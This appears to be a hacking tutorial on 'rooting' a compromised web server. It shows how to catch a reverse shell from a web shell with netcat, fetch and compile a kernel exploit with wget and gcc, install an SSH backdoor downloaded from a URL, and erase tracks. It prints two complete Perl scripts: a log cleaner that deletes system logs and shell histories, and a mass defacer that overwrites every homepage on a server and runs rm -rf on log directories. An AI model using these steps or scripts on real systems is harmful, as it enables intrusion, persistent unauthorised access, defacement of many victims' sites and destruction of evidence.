Hey folks, the topic which I'm gonna share is not my work purely. I just tried it only once (if you wanna believe it). Server rooting is a process where an attacker intrudes to the system or you can say server and escalates the ROOT privileges. Now we are going to learn how it works.
Requisites:
A Shell on a website
An Exploit
Log cleaner
Ssh Backdoor
Netcat
A Brain
Get these from Google ;) lolz
What is rooting ?
Ans: Mentioned above..
What is the need of rooting ?
Ans: Don’t ask me.. :)
Now let's kill the root:
Getting Backconnection to the server-
Copy the Netcat directory to C:\
Open command prompt, type: cd C:\NETCAT
It'll look like this:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\kislay>cd c:\netcat
c:\netcat>
Now Type: nc -l -v -p 2121
It'll look like-
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...
Open your Shell in your browser, go to the backconnection tab, if it is not there get a
shell like "B374k" or Any other
thats your choice.
Specify your ip & port as 2121. press connect, now you'll get a shell to the server, you
can give commands to the server through that shell.
Getting a Right exploit for the server-
Type : Uname -a & hit enter.
It'll look something like this:
[admin@www.saijyotishvani.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010
x86_64 x86_64 x86_64 GNU/Linux
It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.
You need to find a perfect exploit for it. you can find them at-
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
# Leetupload.com
# r00tw0rm.com
# Compiling & executing exploit-
Now I've got an exploit, & it is written in C. So I can't execute it by just uploading.
but I need to compile it.
Before proceeding further, Cd into the tmp directory, coz it is always writable. So type:
Cd /home/XXXXX/public_html/tmp
// The path can be different, replace it with yours.
So first I'll get the exploit on the server, So I type : Wget http://exploitsite.net/exploits/my_exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this-
[admin@www.targetsite.com /home/saijyoti/public_html/tmp]$ wget
http://exploitsite.net/exploits/my_exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/exploits/my_exploit.c
Resolving www.exploitsite.net... 120.139.90.84
Connecting to www.exploitsite.net|120.139.90.84|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `my_exploit.c'
0K .......... .... 100% 189K=0.08s
2011-01-25 08:21:44 (189 KB/s) - `my_exploit.c' saved [15088/15088]
now change the permission of the exploit to 777.
Type: Chmod 777 my_exploit.c
It may look like:
[admin@www. targetsite.com /home/targetsite/public_html/tmp]$ chmod 777 ImpelDown.c
Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: gcc -o exploit exploit.c
It'll compile & save the exploit as exploit
It may look like-
[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ gcc -o exploit exploit.c
Next step is to execute it So we'll type: ./exploit
It may look like:
[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ gcc -o ImpelDown.c
got root you m0f0 !!
Now it say got root. Let's Check is it true,
Type: id
It may look like
uid=0(saijyoti) gid=0(saijyoti) groups=0(root)
Which Means I got root :)
# Installing Backdoor-
type- Wget urlofbackdoor.com/sshdoor.zip
Then Type,
Unzip Sshdoor.zip
Then type, ./run pass port
^ replace pass with your password, & a port.
Now connect with putty & enjoy root privileges. ;)
##################################################################################
Methods to execute exploits written in other languages-
#C exploitgcc
-o exploit exploit.c
chmod +x exploit
./exploit
#Perlperl
exploit.pl
#pythonpython
exploit.py
#phpphp
exploit.php
#zip
unzip exploit.zip
./run
##################################################################################
Cleaning Logs-
# you can use my log cleaner to clear your track :D. It is written in perl. save it as
anything.pl
& to execute type: perl anything.pl
here is the code-
[perl]
#!usr/bin/perl -w #Warnings enabled!
#Log cleaner version Public
#Give Credits Where Needed - Kouros!
#This took time, Hope you fucking use it :D
#Report bugs to info@Kouros-bl4ckhat.com
#NOTE - YOU MUST BE ROOT!
print qq^
####################################
# Log Cleaner 3.0 PUBLIC #
# Kouros #
# #
# Virangar Security Team #
# http://www.Kouros-bl4ckhat.com #
####################################
^;
while(1) {
print "Enter Which OS: "; #User Input
chomp($os = <STDIN>); #Takes it into memory
if($os eq "help"){
print "[+]Enter Your OS! Choose from 'linux', 'aix', 'sunos', 'irix'\n";
print "[+]Hit enter with OS, Let the script do its work\n";
print "[+]Note: You MUST Be Root!\n";
print "[+]Contact Info[at]Kouros-bl4ckhat [dot] Com";
print "[+]For Bug finds... Have Fun!\n";
print "[+] - Kouros";
}
if($os eq "linux"){ #If linux typed, do the following and start brackets
foreach my $logphile(@linux) {
unlink($logphile) || print "[-]Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "sunos"){ #If sunos typed, do the following and start brackets
foreach my $logphile(@sunos) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "aix"){ #If aix typed, do the following and start brackets
foreach my $logphile(@aix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "irix"){ #If irix typed, do the following and start bracket
foreach my $logphile(@irix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} else { print"Umm WTF !?\n"; }
#Logs of Irix Systems
{ #Start Irix Bracket
@irix = ("/var/adm/SYSLOG", "/var/adm/sulog", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/wtmp", "/var/adm/wtmpx", "/var/adm/lastlog/",
"/usr/spool/lp/log", "/var/adm/lp/lp-errs", "/usr/lib/cron/log",
"/var/adm/loginlog", "/var/adm/pacct", "/var/adm/dtmp",
"/var/adm/acct/sum/loginlog", "var/adm/X0msgs", "/var/adm/crash/vmcore",
"/var/adm/crash/unix") #End Array
} #End Irix Bracket
#Log sof Aix Systems
{ #Start Aix Bracket
@aix = ("/var/adm/pacct", "/var/adm/wtmp", "/var/adm/dtmp", "/var/adm/qacct",
"/var/adm/sulog", "/var/adm/ras/errlog", "/var/adm/ras/bootlog",
"/var/adm/cron/log", "/etc/utmp", "/etc/security/lastlog",
"/etc/security/failedlogin", "usr/spool/mqueue/syslog") #End Array
} #End Aix Bracket
#Logs of SunOS Systems
{ #Start SunOS Bracket
@sunos = ("/var/adm/messages", "/var/adm/aculogs", "/var/adm/aculog",
"/var/adm/sulog", "/var/adm/vold.log", "/var/adm/wtmp",
"/var/adm/wtmpx", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/log/asppp.log", "/var/log/syslog",
"/var/log/POPlog", "/var/log/authlog", "/var/adm/pacct",
"/var/lp/logs/lpsched", "/var/lp/logs/requests",
"/var/cron/logs", "/var/saf/_log", "/var/saf/port/log") #End Array
} #End Sunos bracket
#Logs of Linux Systems
{ #Start Linux Bracket
@linux = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp",
"/var/log/secure","/root/.ksh_history", "/root/.bash_history",
"/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp",
"/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs",
"/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy",
"/var/log/proftpd.xferlog", "/var/log/proftpd.access_log",
"/var/log/httpd/error_log", "/var/log/httpsd/ssl_log",
"/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority",
"/var/log/poplog", "/var/log/news.all", "/var/log/spooler",
"/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err",
"/var/log/news/news.notice",
"/var/log/news/suck.err", "/var/log/news/suck.notice",
"/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks",
"/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log",
"/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs",
"/var/log/auth") #End array
} #End linux bracket
} #Ends Loop
[/perl]
##################################################################################
Mass deface- I've a perl to mass deface sites on the server. execute it as the same way
as above.
[perl]
# MSRml V 0.1 #
# #
# MOROCCO.SECURITY.RULZ mass defacer and log eraser #
# #
# coded by PRI[ll #
# #
# !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!! #
# #
# 05/07/2005 #
# #
# usage : perl MSRml.pl <path to index> #
# #
# example : perl MSRml.pl /tmp/index.html #
# #
# the_r00t3r@hotmail.com #
#!/usr/bin/perl
use strict;
my $index = $ARGV[0];
if ($ARGV[0])
{
if( -e $index )
{
system "echo -e "33[01;34mStarted MSRml V0.1 by PRI[ll Ok !!33[01;37m"n";
system "echo -e "\033[01;37mDefacing all homepages ..."n";
system "find / -name "index*" -exec cp $index {} \;";
system "find / -name "main*" -exec cp $index {} \;";
system "find / -name "home*" -exec cp $index {} \;";
system "find / -name "default*" -exec cp $index {} \;";
system "echo -e "\033[01;37m[+] done ! all sites in this box are defaced !"n";
system "echo -e "\033[01;37m----------------------------------------------------------"n";
system "echo -e "\033[01;37mCleaning up logs ..."n";
system "echo -e "33[01;34m---------erasing default log files (too fast
=))---------33[01;37m"n";
if( -e "/var/log/lastlog" )
{
system 'rm -rf /var/log/lastlog';
system "echo -e "\033[01;37m [*]/var/log/lastlog -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/log/lastlog - No such file or directory\033[01;37m"n";
}
if( -e "/var/log/wtmp" )
{
system 'rm -rf /var/log/wtmp';
system "echo -e "\033[01;37m [*]/var/log/wtmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/log/wtmp - No such file or directory\033[01;37m"n";
}
if( -e "/etc/wtmp" )
{
system 'rm -rf /etc/wtmp';
system "echo -e "\033[01;37m [*]/etc/wtmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/etc/wtmp - No such file or directory\033[01;37m"n";
}
if( -e "/var/run/utmp" )
{
system 'rm -rf /var/run/utmp';
system "echo -e "\033[01;37m [*]/var/run/utmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/run/utmp - No such file or directory\033[01;37m"n";
}
if( -e "/etc/utmp" )
{
system 'rm -rf /etc/utmp';
system "echo -e "\033[01;37m [*]/etc/utmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/etc/utmp - No such file or directory\033[01;37m"n";
}
if( -e "/var/log" )
{
system 'rm -rf /var/log';
system "echo -e "\033[01;37m [*]/var/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/log - No such file or directory\033[01;37m"n";
}
if( -e "/var/logs" )
{
system 'rm -rf /var/logs';
system "echo -e "\033[01;37m [*]/var/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/logs - No such file or directory\033[01;37m"n";
}
if( -e "/var/adm" )
{
system 'rm -rf /var/adm';
system "echo -e "\033[01;37m [*]/var/adm -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/adm - No such file or directory\033[01;37m"n";
}
if( -e "/var/apache/log" )
{
system 'rm -rf /var/apache/log';
system "echo -e "\033[01;37m [*]/var/apache/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/apache/log - No such file or directory\033[01;37m"n";
}
if( -e "/var/apache/logs" )
{
system 'rm -rf /var/apache/logs';
system "echo -e "\033[01;37m [*]/var/apache/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/apache/logs - No such file or directory\033[01;37m"n";
}
-10-
C:\Users\kislay\Desktop\rooted.txt 25 January 2011 20:54
if( -e "/usr/local/apache/log" )
{
system 'rm -rf /usr/local/apache/log';
system "echo -e "\033[01;37m [*]/usr/local/apache/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/usr/local/apache/log - No such file or
directory\033[01;37m"n";
}
if( -e "/usr/local/apache/logs" )
{
system 'rm -rf /usr/local/apache/logs';
system "echo -e "\033[01;37m [*]/usr/local/apache/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/usr/local/apache/logs - No such file or
directory\033[01;37m"n";
}
if( -e "/root/.bash_history" )
{
system 'rm -rf /root/.bash_history';
system "echo -e "\033[01;37m [*]/root/.bash_history -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/root/.bash_history - No such file or directory\033[01;37m"n";
}
if( -e "/root/.ksh_history" )
{
system 'rm -rf /root/.ksh_history';
system "echo -e "\033[01;37m [*]/root/.ksh_history -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/root/.ksh_history - No such file or directory\033[01;37m"n";
}
system "echo -e "\033[01;37m[+] -----done all default log and bash_history files erased !!"n";
system "echo -e "33[01;34m---------Now Erasing the rest of the machine log files (can be
long :S)---------33[01;37m"n";
system 'find / -name *.bash_history -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.bash_history files -erased Ok!"n";
system 'find / -name *.bash_logout -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.bash_logout files -erased Ok!"n";
system 'find / -name "log*" -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all log* files -erased Ok!"n";
system 'find / -name *.log -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.log files -erased Ok!"n";
system "echo -e "33[01;34m-------[+] !done all log files erased![+]-------33[01;37m"n";
system "echo -e "33[01;34m---------------------------------------------------33[01;37m"n";
system "echo -e "33[01;34m-----------------MSRml V 0.1----------------------33[01;37m"n";
}
else
{
system "echo -e "\033[01;31m[-] Failed ! the path to u're index could not be found
!\033[01;37m"n";
exit;
}
}
else
{
system "echo -e "\033[01;37m!!Morocco.Security.Rulz mass defacer and log eraser !!"n";
system "echo -e "\033[01;37m!!!!!!!!!!!!!!!!!!coded by PRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n";
system "echo -e
"\033[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!\033[01;37m"n";
system "echo -e "\033[01;37musage : perl $0 <path too u're index>"n";
system "echo -e "\033[01;37mexample : perl $0 /tmp/index.html"n";
exit;
}
